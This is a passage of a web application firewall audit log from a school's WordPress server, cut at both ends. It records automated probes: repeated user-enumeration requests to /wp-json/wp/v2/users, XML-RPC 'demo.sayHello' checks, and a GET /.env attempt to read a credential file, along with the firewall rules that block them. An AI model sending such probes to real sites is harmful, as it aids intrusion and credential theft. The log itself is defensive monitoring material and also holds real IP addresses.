with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747436472792139 2188 (- - -) Stopwatch2: 1747436472792139 2188; combined=971, p1=347, p2=587, p3=0, p4=0, p5=36, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --44008e27-Z-- --a7b09270-A-- [17/May/2025:06:01:12 +0700] aCfDuBKi5m5upc8uMd6hlAAAANA 103.236.140.4 41778 103.236.140.4 8181 --a7b09270-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.99.132 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.99.132 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a7b09270-C-- demo.sayHello --a7b09270-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a7b09270-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747436472788805 6108 (- - -) Stopwatch2: 1747436472788805 6108; combined=4300, p1=570, p2=3505, p3=35, p4=40, p5=86, sr=71, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a7b09270-Z-- --fc085e79-A-- [17/May/2025:06:01:21 +0700] aCfDwRKi5m5upc8uMd6hlgAAANM 103.236.140.4 41792 103.236.140.4 8181 --fc085e79-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.26 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fc085e79-C-- demo.sayHello --fc085e79-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fc085e79-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747436481448889 6702 (- - -) Stopwatch2: 1747436481448889 6702; combined=4726, p1=621, p2=3923, p3=31, p4=34, p5=70, sr=101, sw=47, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fc085e79-Z-- --7a522511-A-- [17/May/2025:06:10:52 +0700] aCfF_Om4kjNN-hEbWjJAagAAAEQ 103.236.140.4 41970 103.236.140.4 8181 --7a522511-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.216 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.216 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7a522511-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a522511-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747437052471991 3666 (- - -) Stopwatch2: 1747437052471991 3666; combined=1558, p1=539, p2=987, p3=0, p4=0, p5=32, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a522511-Z-- --7235fb55-A-- [17/May/2025:06:10:56 +0700] aCfGAOm4kjNN-hEbWjJAbgAAAEs 103.236.140.4 41980 103.236.140.4 8181 --7235fb55-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.216 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.216 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7235fb55-C-- demo.sayHello --7235fb55-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7235fb55-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747437056498158 5235 (- - -) Stopwatch2: 1747437056498158 5235; combined=4082, p1=498, p2=3365, p3=27, p4=31, p5=94, sr=71, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7235fb55-Z-- --a4da3a61-A-- [17/May/2025:06:21:43 +0700] aCfIh-m4kjNN-hEbWjJAdgAAAEM 103.236.140.4 42078 103.236.140.4 8181 --a4da3a61-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.229 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a4da3a61-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a4da3a61-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747437703809216 3115 (- - -) Stopwatch2: 1747437703809216 3115; combined=1330, p1=466, p2=829, p3=0, p4=0, p5=35, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a4da3a61-Z-- --1fe7514b-A-- [17/May/2025:06:21:49 +0700] aCfIjem4kjNN-hEbWjJAeAAAAEU 103.236.140.4 42082 103.236.140.4 8181 --1fe7514b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.229 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1fe7514b-C-- demo.sayHello --1fe7514b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1fe7514b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747437709513398 7003 (- - -) Stopwatch2: 1747437709513398 7003; combined=4917, p1=607, p2=4059, p3=38, p4=41, p5=102, sr=91, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1fe7514b-Z-- --4d3bb306-A-- [17/May/2025:06:22:23 +0700] aCfIr3yxdQCiyU1ENFcmUQAAABQ 103.236.140.4 42086 103.236.140.4 8181 --4d3bb306-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.117.209 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.117.209 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax) Accept-Charset: utf-8 --4d3bb306-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d3bb306-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747437743509821 861 (- - -) Stopwatch2: 1747437743509821 861; combined=339, p1=294, p2=0, p3=0, p4=0, p5=45, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d3bb306-Z-- --e3808525-A-- [17/May/2025:06:23:23 +0700] aCfI63yxdQCiyU1ENFcmUwAAABY 103.236.140.4 42092 103.236.140.4 8181 --e3808525-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.95.116 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.95.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e3808525-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e3808525-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747437803836463 2820 (- - -) Stopwatch2: 1747437803836463 2820; combined=1243, p1=423, p2=789, p3=0, p4=0, p5=31, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e3808525-Z-- --8b2d765a-A-- [17/May/2025:06:23:30 +0700] aCfI8nyxdQCiyU1ENFcmVAAAABc 103.236.140.4 42096 103.236.140.4 8181 --8b2d765a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.95.116 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.95.116 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8b2d765a-C-- demo.sayHello --8b2d765a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8b2d765a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747437810512660 5738 (- - -) Stopwatch2: 1747437810512660 5738; combined=4209, p1=557, p2=3386, p3=30, p4=35, p5=120, sr=76, sw=81, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b2d765a-Z-- --e9d74b51-A-- [17/May/2025:06:30:26 +0700] aCfKkgTOsBn9MSWb6WJt1AAAAIc 103.236.140.4 42154 103.236.140.4 8181 --e9d74b51-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.236 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.236 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e9d74b51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e9d74b51-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747438226772698 2830 (- - -) Stopwatch2: 1747438226772698 2830; combined=1235, p1=422, p2=783, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e9d74b51-Z-- --ba032d5b-A-- [17/May/2025:06:30:33 +0700] aCfKmem4kjNN-hEbWjJAfQAAAEs 103.236.140.4 42158 103.236.140.4 8181 --ba032d5b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.236 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.236 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ba032d5b-C-- demo.sayHello --ba032d5b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ba032d5b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747438233465156 4927 (- - -) Stopwatch2: 1747438233465156 4927; combined=3754, p1=474, p2=3080, p3=23, p4=25, p5=90, sr=69, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ba032d5b-Z-- --58d9c024-A-- [17/May/2025:06:35:20 +0700] aCfLuOm4kjNN-hEbWjJAgAAAAFE 103.236.140.4 42176 103.236.140.4 8181 --58d9c024-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.175.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.175.141 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --58d9c024-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --58d9c024-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747438520880244 3135 (- - -) Stopwatch2: 1747438520880244 3135; combined=1349, p1=494, p2=821, p3=0, p4=0, p5=34, sr=139, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58d9c024-Z-- --3498cc18-A-- [17/May/2025:06:35:25 +0700] aCfLvRKi5m5upc8uMd6hqAAAAMA 103.236.140.4 42180 103.236.140.4 8181 --3498cc18-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.175.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.175.141 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3498cc18-C-- demo.sayHello --3498cc18-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3498cc18-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747438525842343 4484 (- - -) Stopwatch2: 1747438525842343 4484; combined=3502, p1=420, p2=2889, p3=23, p4=23, p5=87, sr=65, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3498cc18-Z-- --fd1c5b59-A-- [17/May/2025:06:35:42 +0700] aCfLzhKi5m5upc8uMd6hqwAAAMQ 103.236.140.4 42186 103.236.140.4 8181 --fd1c5b59-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.199 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.199 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fd1c5b59-C-- demo.sayHello --fd1c5b59-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd1c5b59-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747438542606163 6402 (- - -) Stopwatch2: 1747438542606163 6402; combined=4588, p1=574, p2=3774, p3=38, p4=41, p5=96, sr=75, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd1c5b59-Z-- --41b10c76-A-- [17/May/2025:06:40:21 +0700] aCfM5em4kjNN-hEbWjJAggAAAFQ 103.236.140.4 42220 103.236.140.4 8181 --41b10c76-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.76.190 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.76.190 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --41b10c76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --41b10c76-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747438821683195 3360 (- - -) Stopwatch2: 1747438821683195 3360; combined=1426, p1=488, p2=904, p3=0, p4=0, p5=33, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --41b10c76-Z-- --9d46d846-A-- [17/May/2025:06:40:27 +0700] aCfM6-m4kjNN-hEbWjJAhAAAAFc 103.236.140.4 42224 103.236.140.4 8181 --9d46d846-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.76.190 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.76.190 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9d46d846-C-- demo.sayHello --9d46d846-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d46d846-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747438827836548 4803 (- - -) Stopwatch2: 1747438827836548 4803; combined=3683, p1=423, p2=3055, p3=22, p4=24, p5=93, sr=64, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d46d846-Z-- --0f7cd31c-A-- [17/May/2025:06:41:24 +0700] aCfNJOm4kjNN-hEbWjJAhgAAAEI 103.236.140.4 42228 103.236.140.4 8181 --0f7cd31c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.201.10.17 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.10.17 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 